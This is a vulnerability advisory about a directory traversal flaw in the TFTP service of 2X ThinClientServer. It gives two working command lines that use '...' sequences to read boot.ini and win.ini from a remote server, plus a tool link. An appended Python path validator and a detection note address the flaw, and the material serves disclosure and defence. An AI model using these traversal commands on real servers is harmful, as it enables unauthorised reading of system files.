2xthinclient-traverse.txt

01 Apr 2008 00:00:00 | Reported by Luigi Auriemma | Type: packetstorm | Source: packetstormsecurity.com

2X ThinClientServer directory traversal vulnerability, version <= v5.0_sp1-r3497, Window

`  
#######################################################################  
  
Luigi Auriemma  
  
Application: 2X ThinClientServer  
http://www.2x.com/thinclientserver/  
Versions: <= v5.0_sp1-r3497  
(TFTPd.exe <= 3.2.0.0)  
Platforms: Windows  
Bug: directory traversal  
Exploitation: remote  
Date: 29 Mar 2008  
Author: Luigi Auriemma  
e-mail: [email protected]  
web: aluigi.org  
  
  
#######################################################################  
  
  
1) Introduction  
2) Bug  
3) The Code  
4) Fix  
  
  
#######################################################################  
  
===============  
1) Introduction  
===============  
  
  
From the manual:  
"2X ThinClientServer allows you to deploy a thin client OS to low-cost  
thin client devices and existing PCs, and centrally manage settings and  
configure to which terminal servers (Windows or Linux) a user should  
log on to."  
  
  
#######################################################################  
  
======  
2) Bug  
======  
  
  
The 2X TFTP Service enabled by default in ThinClientServer is affected  
by a directory traversal vulnerability exploitable through the usage of  
a sequence of 3 dots (instead of the classical two) for reaching the  
various parent directories.  
  
  
#######################################################################  
  
===========  
3) The Code  
===========  
  
  
http://aluigi.org/testz/tftpx.zip  
  
tftpx SERVER .../.../.../.../.../.../boot.ini none  
tftpx SERVER ...\...\...\...\...\...\windows\win.ini none  
  
  
#######################################################################  
  
======  
4) Fix  
======  
  
  
No fix  
  
  
#######################################################################  
  
  
---   
Luigi Auriemma  
http://aluigi.org  
`
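The advisory lists no fix, so the following is an added example (not from the advisory, the vendor, or the tftpx tool) of how a TFTP service on Windows can validate a requested file name so that dots-only components such as `...` are refused along with the classical `..`. The root directory `C:\TFTPRoot` and the function name `safe_tftp_path` are assumptions made for illustration.

```python
import ntpath
import re
from typing import Optional

# Hypothetical TFTP root directory, assumed for this example only.
TFTP_ROOT = r"C:\TFTPRoot"


def safe_tftp_path(requested: str, root: str = TFTP_ROOT) -> Optional[str]:
    """Return the absolute path to serve, or None if the request must be refused."""
    if not requested or "\x00" in requested:
        return None
    # Treat '/' and '\' alike: the advisory shows both separators working.
    parts = re.split(r"[\\/]+", requested)
    if parts[0] == "":              # leading separator: absolute or UNC-style path
        return None
    for part in parts:
        if part == "":              # trailing separator, no file named
            return None
        if ":" in part:             # drive letter or alternate data stream
            return None
        if part.strip(". ") == "":  # ".", "..", "...", "....": never a file name
            return None
        if part != part.rstrip(". "):
            return None             # Win32 strips trailing dots/spaces: ambiguous
    # Second, independent layer: build the path and confirm it stays under root.
    root_norm = ntpath.normpath(root)
    candidate = ntpath.normpath(ntpath.join(root_norm, *parts))
    if ntpath.commonpath([root_norm, candidate]).lower() != root_norm.lower():
        return None
    return candidate


if __name__ == "__main__":
    # Constructed sample requests; the two traversal strings are the ones
    # quoted in the advisory.
    for name in ("pxelinux.0", "images/boot.img",
                 ".../.../.../.../.../.../boot.ini",
                 "...\\...\\...\\...\\...\\...\\windows\\win.ini",
                 "../boot.ini"):
        print(f"{name!r:55} -> {safe_tftp_path(name)}")
```

Logging every refused name gives a detection signal as well: a read request containing a dots-only component has no legitimate use in a thin-client boot sequence.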

Vulners AI Score: 7.4 (High risk)